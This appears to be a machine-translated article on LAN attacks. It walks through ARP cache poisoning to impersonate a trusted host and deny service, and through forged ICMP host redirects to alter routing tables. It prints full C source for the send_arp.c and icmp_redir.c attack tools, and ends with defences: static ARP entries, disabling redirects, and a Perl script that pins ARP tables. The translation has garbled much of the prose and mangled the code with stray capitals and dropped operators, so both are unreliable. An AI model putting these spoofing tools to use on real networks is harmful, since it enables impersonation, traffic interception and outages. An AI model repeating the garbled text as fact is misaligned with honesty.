ARP & ICMP spoof
For bystanders, the shortcomings and advantages of things often exist at the same time. I am very happy to show you two regular agreements - RARP and ICMP, but when you use some special methods, you can get unexpected results. Relative to passive attacks (network listeners Sniffing), active attacks are not common - many administrators have a network monitoring tool to help them manage bodies networks. In your LAN, active attack will add brilliance and fun to your life. You know, just some technical details make these corners dim. So, let's see what it is. Let's first describe the spoofing and reject service (DOS-Deny of Service). Like IP blind attacks, cyber attacks are often very ordinary and powerful, but for users, you need a lot of work (often guess), and it is difficult to implement. But ARP deception is just the opposite, it is very easy to use and convenient.
First, ARP spoof
ARP deception is often applied to an internal network, we can use it to expand an existing network security vulnerability. If you can invade a machine in a subnet, other machine safety will also be threatened by ARP. Let us consider the network structure IP 10.0.0.0.0.0.0.2 10.0.0.3 10.0.0.4Hostname Cat Dog Bathw Addr AA: AA BB: BB CC: CC DD: DD All hosts in Ethernet in a simple way Connect (no switches, smart HUB). You are CAT, you have root privileges, your goal is to invade Dog. And you know that Dog trust RAT, so if you can disappear into Rat, you can get some unexpected things. Maybe you first thought about, "Why don't I set my IP to Rat, then ...", this way is unable to work, and I can't work. If you set the CAT's IP to 10.0.0.2, CAT will answer the ARP request with this IP. But Rat will also. This way you entered a pure competitive state, and this game has no winner. Conversely, you will lose this game easily, because many tools will immediately discover the phenomenon of this IP conflict, complaining. Some network traffic analysis tools often record it. A nausea record (the physical address of the CAT) is still retained in the log file of the network administrator. This is not what you want. You can't get what you want, and walk with your target. This thing is what you want, an attack program --send_arp.c, a very effective tool. As its name, it sends an ARP package (ARP answers, accurately: Since this protocol is stateless, you can make a response even when there is no request. The request is the same as the response.) On, you can make this package to what you want. And what you want is just that you can detelect the source IP and the purpose IP, and the hardware address. When you do ARP deception, you don't want your NIC to talk, then you can use "ifconfig eth0 -arp" to turn off your ARP protocol. Of course, no matter how you need ARP information, manually build it and make it the kernel. It is important to get the trust of people around you. In this example, you want the hardware address of Dog thinks that the hardware address of the RAT is AA: AA (CAT), so you send an ARP response, its source address is 10.0.0.2, the source hardware address is aa: AA, the target address is 10.0. 0.3 and the target hardware address is CC: CC. Now, the hardware address of the DOG is completely believed is AA: AA. Of course, the DOG is cacked will expire, so it needs to be updated (re-send request). How long does it take to issue a request, and each operating system is different, but most of them are about 40 seconds. I often send ARP responses, which will not have harm for you. Different from the ARP cache processing method will bring complexity. Some operating systems (such as Linux) will be used to send non-broadcast ARP requests to cache addresses to request update caches (just like your wife calls to see if you are not in the same). This kind of cache update will add trouble to give you the ARP cache you just fake, so you must avoid this. Regularly issue answers to DOG, so that it will not issue a request. It is prevention. For RAT, it has no chance to change this. So the process is simple.
First set the network interface alias (ifconfig eth0: 1 10.0.0.2), add the RAT IP address and open the ARP protocol (ifconfig eth0 ARP) - you need to set your ARP cache, when there is no ARP, it will not work. Then set to the route of the DOG on the correct network interface. Set the DOG ARP cache. Finally, turn off the ARP function of the network interface. This is OK. Now, when you use Send_arp to inject the venom to the venom (DOG and RAT), Dog will think that you are RAT. Be sure to continue to send an ARP package to DOG and RATs continuously. This kind of attack is only working in a local area network (usually, the ARP package is not routed). An interesting attempt is, replacing the DOG in our above trials into a router, if possible (I don't sure it will be established, the router's ARP function is not so easy to deceive), you can easily pretend to be in this LAN. The machine deceives this Internet world. So the target can be any machine, but the machine you want to disguise must be in this LAN. In addition to deception, you can use ARP to make a lot of things. Under the blue sky, you can call you. Or, DOS is also a very useful program. Give the Rat an error hardware address is a very effective way to make it shut up. You can avoid requesting to some special machines (an ARP buffer pool usually blocks the content of the entire network, so you can effectively prevent it from issuing a request to other machines over a period of time). Very obvious goals can also be a router. Interference caching requires two steps: disrupted machine and you don't want it to communicate with it. This approach is not often role. ARP request is actively issued when there is no target machine in this machine discovery cache. Of course, your next droplet fluid will be injected quickly, but you need to maintain this state. A more effective way is to give RAT a wrong DOG hardware address so that Rat can maintain normal working status and will not interfere with your activity. Similarly, this method also depends on different environments. The usual situation is that RAT will send a variety of different packages to the error target, and the target will return to ICMP to not arrive in information, thereby maintaining an unfair way. connection. This camouflage connection can postpone the cache update time. On Linux, we can be updated from 1 minute to 10 minutes. During this time, you can complete most of the TCP connection to complete. There is a fun called "unreasonable ARP" here. In this ARP request package, the source IP is the same as the destination IP, usually it is transmitted by Ethernet broadcast. Some executives believe that this is a special case - the system's own update information, and add this request in its own cache. In this way, affecting the entire network. This is unquestionable, but this is not part of the ARP protocol, but is made by the executive to decide whether it is (or not), which has become uncomfortable. ARP can also be used to open some very professional jokes. If someone sets a repeater or a pipeline, just use his own machine to defraud the trust of two adjacent machines, and send the communication package to this machine. If this machine is just forwarding data, then no one will find it. But when it only makes some very few changes, it will add a very big trouble to you. For example, a random change in several digits in the packet, which causes a checksum error. The data stream seems to be no lossless error without any reason. Second, ICMP redirection
Another means of more effective and similar to ARP deception is to use another normal protocol - ICM redirection. This redirection is usually sent by your default router, and you have a closer route to a network. Initially, it can be notified to the network redirection, or the redirection of the host, but now, only the host redirection is left due to the network redirection. Correctly making a completely check ICMP package (must be sent by the default router, the redirecting machine, the new route should be a direct connection of a network, etc.), the recipient will update the system's routing table. This is the security issue of ICMP. The IP address of a router is simple, ICMP_Redir.c is working on this job. The RFC declaration system must follow this redirection unless you are a router. In fact, almost all systems support this (except Vanilla Linux 2.0.30). ICMP is redirected to provide a very powerful DOS tool. Unlike the ARP cache update, the routing table does not exist. And don't need to be in the local network, you can initiate an attack from anywhere. So after the target accepts the ICMP redirection (package exact arrival), the target will not communicate with some machines on the network (yes, not all machines, but some machines that are not in the same network with the target machine. ). The domain name server will be a very good attack target. / * Send_arp.c This program sends an ARP package, providing the source / destination IP and NIC address by the user. Compile and run in a Linux environment, you can also run on other unix systems with SOCK_PACKET. This program is the verification of the above theory, only this. * /
#include
#define eth_hw_addr_len 6 # define ip_addr_len 4 # define arp_frame_type 0x0806 # define Ether_hw_type 1 # define ip_proto_type 0x0800 # define op_ARP_Request 2
#define default_device "eth0"
Char usage [] = {"send_arp: sends out custom arp packet./n/tusage: send_arp src_ip_addr src_hw_addr targ_ip_addr TAR_HW_ADDR / N / N"};
struct arp_packet {u_char targ_hw_addr [ETH_HW_ADDR_LEN]; u_char src_hw_addr [ETH_HW_ADDR_LEN]; u_short frame_type; u_short hw_type; u_short prot_type; u_char hw_addr_size; u_char prot_addr_size; u_short op; u_char sndr_hw_addr [ETH_HW_ADDR_LEN]; u_char sndr_ip_addr [IP_ADDR_LEN]; u_char rcpt_hw_addr [ETH_HW_ADDR_LEN] U_CHAR RCPT_IP_ADDR [IP_ADDR_LEN]; u_char padding [18];}; void Die (char *); void get_ip_addr (struct in_addr *, char *); void get_hw_addr (char *, char *);
INT main (int Argc, char ** argv) {
Struct in_addr src_in_addr, targ_in_addr; struct arp_packet pkt; structure sockaddr sa; int suck;
IF (argc! = 5) DIE (USAGE);
SOCK = Socket (AF_INET, SOCK_PACKET, HTONS (Eth_P_RARP)); IF (SOCK <0) {PERROR ("socket"); exit (1);}
pkt.frame_type = htons (ARP_FRAME_TYPE); pkt.hw_type = htons (ETHER_HW_TYPE); pkt.prot_type = htons (IP_PROTO_TYPE); pkt.hw_addr_size = ETH_HW_ADDR_LEN; pkt.prot_addr_size = IP_ADDR_LEN; pkt.op = htons (OP_ARP_REQUEST);
GET_HW_ADDR (pkt.targ_hw_addr, argv [4]); get_hw_addr (pkt.rcpt_hw_addr, argv [4]); get_hw_addr (pkt.src_hw_addr, argv [2]); get_hw_addr (pkt.sndr_hw_addr, argv [2]);
GET_IP_ADDR (& SRC_IN_ADDR, Argv [1]); Get_ip_addr (& Targ_in_addr, Argv [3]);
Memcpy (pkt.sndr_ip_addr, & src_in_addr, ip_addr_len); Memcpy (pkt.rcpt_ip_addr, & targ_in_addr, ip_addr_len);
Bzero (pkt.padding, 18);
STRCPY (SA.SA_DATA, Default_Device); IF (SENDTO (SOCK, & PKT, SIZEOF (PKT), 0, & SA, SIZEOF (SA)) <0) {PERROR ("Sendto"); EXIT (1);} exit 0);
Void Die (Char * Str) {FPrintf (stderr, "% s / n", str); exit (1);}
Void get_ip_addr (struct in_addr * in_addr, char * STR) {
Struct Hostent * Hostp;
IN_ADDR-> S_ADDR = INET_ADDR (STR); if (in_addr-> s_addr == -1) {IF ((Hostp = gethostByname (STR))) BCOPY (HostP-> h_addr, in_addr, hostp-> h_length; else { FPRINTF (stderr, "send_arp: unknown host% s / n", str); exit (1);}}} void get_hw_addr (char * buf, char * str) {
Int i; char C, VAL;
For (i = 0; i
* BUF = val << 4; if (! (c = tolower (* Str ))) DIE ("Invalid Hardware Address"); if (Isdigit (c)) VAL = C-'0 '; ELSE IF (C> = 'a' && c <= 'f') val = c-'a ' 10; Else Die ("Invalid Hardware Address);
* BUF | = Val;
IF (* str == ':') Str ;}}
/ * ICMP_REDIR.C This program sent an ICMP host redirection packet by the gateway address provided by the user. Tested on Linux2.0.30 and valid for most UNIX machines. This program is the verification of the above theory, only this. * /
#include
#define ipversion 4
Struct Raw_pkt {structure iphdr ip; / * this is Linux-style iphdr. Use bsd-style struct ip if you want * / struct icmphdr icmp; struct iPhdr ENCL_IPHDR; char ENCL_IP_DATA [8];
Struct Raw_pkt * pkt;
Void Die (char *); unsigned long int GET_IP_ADDR (char *); unsigned short checksum; int main (int Argc, char ** argv) {
struct sockaddr_in sa; int sock, packet_len; char usage [] = { "icmp_redir: send out custom ICMP host redirect packet yuri volobuev'97 / n / tusage: icmp_redir gw_host targ_host dst_host dummy_host / n."}; char on = 1;
IF (argc! = 5) DIE (USAGE);
IF ((SOCK = Socket (AF_INET, SOCK_RAW, IPPROTO_RAW) <0) {Perror ("Socket"); exit (1);
Sa.sin_addr.s_addr = get_ip_addr (argv [2]); sa.sin_family = AF_INET;
Packet_len = sizeof (struct raw_pkt); pkt = calloc ((size_t) 1, (size_t) packet_len;
PKT-> ip.version = ipversion; pkt-> ip.ihl = sizeof (struct iPhdr) >> 2; pkt-> ip.tos = 0; pkt-> ip.tot_len = htons (packet_len); pkt-> ip .id = htons (getPid () & 0xfff); pkt-> ip.frag_off = 0; pkt-> ip.ttl = 0x40; pkt-> ip.protocol = ipproto_icmp; pkt-> ip.check = 0; pkt- > ip.saddr = get_ip_addr (argv [1]); pkt-> ip.daddr = sa.sin_addr.s_addr; pkt-> ip.check = checksum ((unsigned short *) PKT, SIZEOF (Struct iPhdr));
PKT-> ICMP.TYPE = ICMP_REDIRECT; pkt-> icmp.code = ICMP_REDIR_HOST; PKT-> ICMP.CHECKSUM = 0; pkt-> icmp.un.gateway = get_ip_addr (Argv [4]);
memcpy (& (pkt-> encl_iphdr), pkt, sizeof (struct iphdr)); pkt-> encl_iphdr.protocol = IPPROTO_IP; pkt-> encl_iphdr.saddr = get_ip_addr (argv [2]); pkt-> encl_iphdr.daddr = GET_IP_ADDR (Argv [3]); pkt-> encl_iphdr.check = 0; pkt-> encl_iphdr.check = checksum ((unsigned short *) & (pkt-> encl_iphdr), SIZEOF (Struct iPhdr));
pkt-> icmp.checksum = checksum ((unsigned short *) & (pkt-> icmp), sizeof (struct raw_pkt) -sizeof (struct iphdr)); if (setsockopt (sock, IPPROTO_IP, IP_HDRINCL, (char *) & on SizeOf (ON)) <0) {Perror ("setsockopt: ip_hdrincl"); exit (1);}
IF (SENDTO (SOCK, PKT, Packet_len, 0, (Struct SockAddr *) & Sa, SizeOf (SA)) <0) {Perror ("Sendto"); exit (1);} exit (0);
Void Die (Char * Str) {FPrintf (stderr, "% s / n", str); exit (1);}
Unsigned long int GET_IP_ADDR (Char * STR) {
Struct hostent * hostp; unsigned long int addr;
IF ((AddR = INET_ADDR (STR)) == -1) {IF ((HostP = gethostByname (STR))) Return * (HostP-> h_addr); else {fprintf (stderr, "unknown Host% S / N ", STR); exit (1);}} Return Addr;
UNSIGNED Short Checksum (unsigned short * addr, char g) {register long sum = 0;
While (LEN> 1) {SUM = * Addr ; LEN - = 2;} if (len> 0) SUM = * Addr; while (SUM >> 16) SUM = (SUM & 0xFFFF) (SUM >> 16);
Return ~ Sum;}
Third, solution
For most people, ARP is a hidden underlying protocol. You can observe it from time to time, but it usually doesn't have anyone to be interested in it. You can use the ARP command to check your ARP cache, but when a problem occurs, this is not what we first think of. Windows also exists this command, remember this, maybe help you. But when an ARP spoof is sent to you from another network through the gateway, I am afraid that you have no power. Similarly, you can also find redirected routing information (Route commands, with "D" flags in your routing table). ARP attack design to attack 10Base2 Ethernet. If the network has some more advanced ways, it is usually a smart HUB or switch, then the attack is easily discovered, or even impossible (similar to passive attack). So this is a reason for updating your network equipment to your boss. I think so, ICMP redirect is really a very crazy idea. First of all, some networks are very simple, and the routing table does not require any addition; secondly, most of the stable networks are just manual ways to update the route. This is not a frequent updated work, why should ICMP? Finally, this is very dangerous for you, you can turn off the ICMP redirection on your system, which can reduce the conflict with RFC 1122. Oh, this is not easy! On Linux, you can recompile the kernel on this machine that provides source code. On Irix 6.2 and some other systems, "SET ICMP_DROPREDIRECTS = 1". This doesn't know what to do with other OS. Time proves this truth: Do not trust unconfirmed hosts. Otherwise, the online God will not give you mercy. Some people think "I have a firewall, I am afraid of who" thinking that some security issues have nothing to do with it. I acknowledge the role of the firewall, but this is not often valid. Imagine such an environment, all the machines are connected directly to the Internet, you have to share your internal network with people you don't know, they use the Vanilla SGI machine, and they are simply telling others everywhere " Let's make it very simple. "(This, those people know Unix, from Jurassic Park ...), in addition, to your router is controlled by other agencies. Let us come to a standard network environment, which will provide us safe, not affected by external attacks. People work here, using a computer. Similarly, there is also a security problem in each machine here. So, when you mention the firewall next time, remember it does not protect everyone. John Goerzen provides a Perl script that can be run when the system is started. It is mainly to maintain a known IP address and set flag to the hardware address in the Linux machine, so that it will not be updated and changed. The profile is very simple-IP Addr with Mac Addr, split by space bar, "#" as a comment. This script is only tested on the Linux machine - people on other platforms need to modify the format of the ARP command. Note: The script needs to run after the network interface is started, the service and the customer are running; in addition, some people steal the connection when ARP is locked. The following is its script: #! / Usr / bin / perl # Program: Forcehwaddr # program to run arp to force ceert Tables.
# Specify filenames to read from on command line, or read from stdin.Foreach (<>) {# for each infut line .... chomp; # Strip if cr / lfif (/ ^ # /) {next;} # i IT's a comment, Skip it.if ((($ Host, $ HW) = //s* (. ? )/s (/s ) == 2) &&! (/ ^ # / )) {# The text Between The Slashes Parses: # ignore leading whitespace. (/ S *) # THEN, START MATCHING AND PUT IT INTO $ Host ($ Host, (. ?)) # Skip over .
# T, the if checks to see one thing Both a # host and a hardware address were matched. # (2 matches). If NOT, We Skip The # line (Assuming it is blank or invalid or something). # The second part of The if Checks to see................. ..
# OtherWise, Run The appropriate Command: Printf ("Setting IP% -15S to Hardware Address% S / N", $ Host, $ HW); System "/ usr / sbin / arp -s $ host $ hw / n"; }
